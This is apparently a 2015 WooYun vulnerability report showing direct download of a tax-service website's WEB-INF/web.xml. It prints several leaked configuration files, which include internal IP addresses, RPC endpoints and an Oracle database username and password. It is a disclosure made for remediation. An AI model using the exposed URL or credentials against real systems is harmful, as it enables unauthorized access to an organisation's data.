当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154523

漏洞标题:航天信息某站文件任意读取(涉及多个配置文件)

相关厂商:航天信息股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-20 14:39

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经确认,细节仅向厂商公开
2015-12-05: 细节向核心白帽子及相关领域专家公开
2015-12-15: 细节向普通白帽子公开
2015-12-25: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

再来一发。

详细说明:

http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/web.xml

4.png

漏洞证明:

web.xml

<web-app>
<context-param>
<param-name>webAppRootKey</param-name>
<param-value>app1.root</param-value>
</context-param>
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/ApplicationContext.xml</param-value>
</context-param>
<context-param>
<param-name>log4jConfigLocation</param-name>
<param-value>/WEB-INF/classes/log4j.properties</param-value>
</context-param>
<servlet>
<servlet-name>RpcServlet</servlet-name>
<servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
<init-param>
<param-name>home-class</param-name>
<param-value>com.aisino.ahbsdt.rpc.NssbRPCImpl</param-value>
</init-param>
<init-param>
<param-name>home-api</param-name>
<param-value>com.aisino.ahbsdt.rpc.INssbRPC</param-value>
</init-param>
</servlet>
<servlet>
<servlet-name>SpringContext</servlet-name>
<servlet-class>com.aisino.ahbsdt.util.SpringContext</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<listener>
<listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
</listener>
<servlet>
<servlet-name>action</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>/WEB-INF/struts-config.xml</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>3</param-value>
</init-param>
<init-param>
<param-name>detail</param-name>
<param-value>3</param-value>
</init-param>
<load-on-startup>0</load-on-startup>
</servlet>
<servlet>
<servlet-name>GenRandomDigiImg</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.GenRandomDigiImg</servlet-class>
</servlet>
<servlet>
<servlet-name>pbdb</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.PbBdServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>log4jConfigLocation</servlet-name>
<servlet-class>org.springframework.web.util.Log4jConfigServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>RPCLoginServlet</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.RPCLoginServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>RPCLoginMd5Servlet</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.RPCLoginMd5Servlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RpcServlet</servlet-name>
<url-pattern>/servlet/RpcServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>pbdb</servlet-name>
<url-pattern>/servlet/PbBdTemp</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>GenRandomDigiImg</servlet-name>
<url-pattern>/servlet/GenRandomDigiImg</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>RPCLoginServlet</servlet-name>
<url-pattern>/servlet/RPCLoginServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>RPCLoginMd5Servlet</servlet-name>
<url-pattern>/servlet/RPCLoginMd5Servlet</url-pattern>
</servlet-mapping>
<mime-mapping>
<extension>doc</extension>
<mime-type>application/msword</mime-type>
</mime-mapping>
<welcome-file-list>
<welcome-file>login.jsp</welcome-file>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>http://struts.apache.org/tags-bean</taglib-uri>
<taglib-location>/WEB-INF/tld/struts-bean.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://struts.apache.org/tags-logic</taglib-uri>
<taglib-location>/WEB-INF/tld/struts-logic.tld</taglib-location>
</taglib>
</web-app>


struts-config.xml

<struts-config>
<data-sources/>
<form-beans>
<form-bean name="Post" type="com.aisino.ahbsdt.web.form.PostForm"/>
</form-beans>
<global-exceptions/>
<global-forwards>
<forward name="login" path="/login.jsp" redirect="false"/>
<forward name="login_success" path="/index.jsp" redirect="false"></forward>
</global-forwards>
<action-mappings>
<action parameter="act" path="/login" type="com.aisino.ahbsdt.web.action.LoginAction">
<forward name="postslistforadmin" path="/adminpostlist.jsp"/>
<forward name="viewpostslist" path="/postlist.jsp"/>
</action>
<action name="Post" path="/post" parameter="method" type="com.aisino.ahbsdt.web.action.PostAction">
<forward name="list" path="/postlist.jsp"/>
</action>
<action path="/theme" parameter="method" type="com.aisino.ahbsdt.web.action.ThemeAction"/>
<action path="/taxReport" parameter="method" type="com.aisino.ahbsdt.web.action.TaxReportAction"/>
<action path="/download" type="com.aisino.ahbsdt.web.action.DownloadAction">
<forward name="unauthorized" path="/403.html"/>
<forward name="fileNotFound" path="/404.html"/>
</action>
<action path="/showMessage" type="com.aisino.ahbsdt.web.action.ShowMessageAction" parameter="method"></action>
</action-mappings>
<controller>
<set-property property="processorClass" value="org.springframework.web.struts.AutowiringRequestProcessor"/>
</controller>
<message-resources parameter="com.aisino.struts.ApplicationResources"/>
<plug-in className="org.springframework.web.struts.ContextLoaderPlugIn">
<set-property property="contextConfigLocation" value="/WEB-INF/applicationContext.xml"/>
</plug-in>
</struts-config>


ApplicationContext.xml

<beans>
<!--
	<bean id="bsdtDS" class="org.apache.commons.dbcp.BasicDataSource"
		destroy-method="close">
		<property name="driverClassName">
			<value>oracle.jdbc.OracleDriver</value>
		</property>
		<property name="url">
			<value>jdbc:oracle:thin:@172.16.1.196:1521:nsfwdb</value>
		</property>
		<property name="username">
			<value>htxx</value>
		</property>
		<property name="password">
			<value>oracle</value>
		</property>
	</bean>
	
-->
<bean id="bsdtDS" class="org.springframework.jndi.JndiObjectFactoryBean">
<property name="jndiName">
<value>NSFW_DB</value>
</property>
</bean>
<bean id="increment" class="org.springframework.jdbc.support.incrementer.OracleSequenceMaxValueIncrementer">
<property name="incrementerName" value="SEQ_DT_POSTID"/>
<property name="dataSource" ref="bsdtDS"/>
</bean>
<bean id="oracleLobHandler" class="org.springframework.jdbc.support.lob.OracleLobHandler">
<property name="nativeJdbcExtractor">
<bean class="org.springframework.jdbc.support.nativejdbc.CommonsDbcpNativeJdbcExtractor"/>
</property>
</bean>
<bean id="postDAO" class="com.aisino.ahbsdt.dao.impl.PostDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
<property name="handler">
<ref bean="oracleLobHandler"/>
</property>
<property name="increment">
<ref bean="increment"/>
</property>
</bean>
<!--  本地业务类  -->
<!--
	<bean id="bsdtBUSImpl" class="test.TestBsdtService">
-->
<!-- 		<property name="bsdtDAO"> -->
<!-- 			<ref bean="bsdtDAOImpl" /> -->
<!-- 		</property> -->
<!-- 		<property name="rpcbus"> -->
<!-- 			<ref bean="rpcbus" /> -->
<!-- 		</property> -->
<!-- 	</bean> -->
<bean id="postService" class="com.aisino.ahbsdt.bus.impl.PostBUSImpl">
<property name="dao">
<ref bean="postDAO"/>
</property>
</bean>
<bean id="bsdtDAOImpl" class="com.aisino.ahbsdt.dao.impl.BsdtDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
</bean>
<bean id="bsdtBUSImpl" class="com.aisino.ahbsdt.bus.impl.BsdtBUSImpl">
<property name="bsdtDAO">
<ref bean="bsdtDAOImpl"/>
</property>
<property name="rpcbus">
<ref bean="rpcbus"/>
</property>
</bean>
<bean id="lwzcBUSImpl" class="com.aisino.ahbsdt.bus.impl.LwzcBUSImpl"></bean>
<bean id="rpcbus" class="com.aisino.ahbsdt.bus.impl.RpcBUSImpl">
<property name="nssbrpc">
<ref bean="nsrxxServiceRPC"/>
</property>
</bean>
<!--  远程调用   -->
<bean id="hessianProxyFatory" class="com.caucho.hessian.client.HessianProxyFactory">
<property name="readTimeout" value="90000"/>
</bean>
<bean id="nsrxxServiceRPC" class="org.springframework.remoting.caucho.HessianProxyFactoryBean">
<property name="proxyFactory">
<ref bean="hessianProxyFatory"/>
</property>
<property name="serviceUrl" value="http://61.190.68.67/nssbweb_ais/RpcServlet"/>
<property name="serviceInterface" value="aisino.nssb.ejb.NSSBRpc"/>
</bean>
<bean id="declarationAuthenticationService" class="org.springframework.remoting.caucho.HessianProxyFactoryBean">
<property name="serviceUrl" value="http://192.168.2.13:8011/ahwsbsdt/servlet/RpcServlet"/>
<property name="serviceInterface" value="com.aisino.ahbsdt.rpc.INssbRPC"/>
</bean>
<!--  权限  -->
<bean id="permissionService" class="com.aisino.ahbsdt.bus.impl.PermissionBUSImpl"></bean>
<!--  界面模块配置  -->
<bean id="themeConfig" class="com.aisino.ahbsdt.web.theme.ThemeConfig" init-method="refresh">
<property name="themeConfigLoader" ref="themeConfigLoader"/>
</bean>
<bean id="themeConfigLoader" class="com.aisino.ahbsdt.web.theme.XMLThemeConfigLoader"/>
<bean id="showMessageDAOImpl" class="com.aisino.ahbsdt.dao.impl.ShowMessageDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
</bean>
</beans>


log4j.properties

log4j.rootLogger=error,CON
log4j.logger.com=ERROR,stdout
log4j.appender.CON=org.apache.log4j.ConsoleAppender
log4j.appender.CON.layout=org.apache.log4j.PatternLayout
log4j.appender.CON.layout.ConversionPattern=[%d] %-5p %c - %m%n
#logfile configure
log4j.appender.logfile=org.apache.log4j.DailyRollingFileAppender
log4j.appender.logfile.File=nsfw_error.log
log4j.appender.logfile.layout=org.apache.log4j.PatternLayout
log4j.appender.logfile.layout.ConversionPattern= %d %p [%c] - <%m>%n

修复方案:

权限~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-25 10:27

厂商回复:

感谢反馈,已联系技术人员处理。

最新状态:

暂无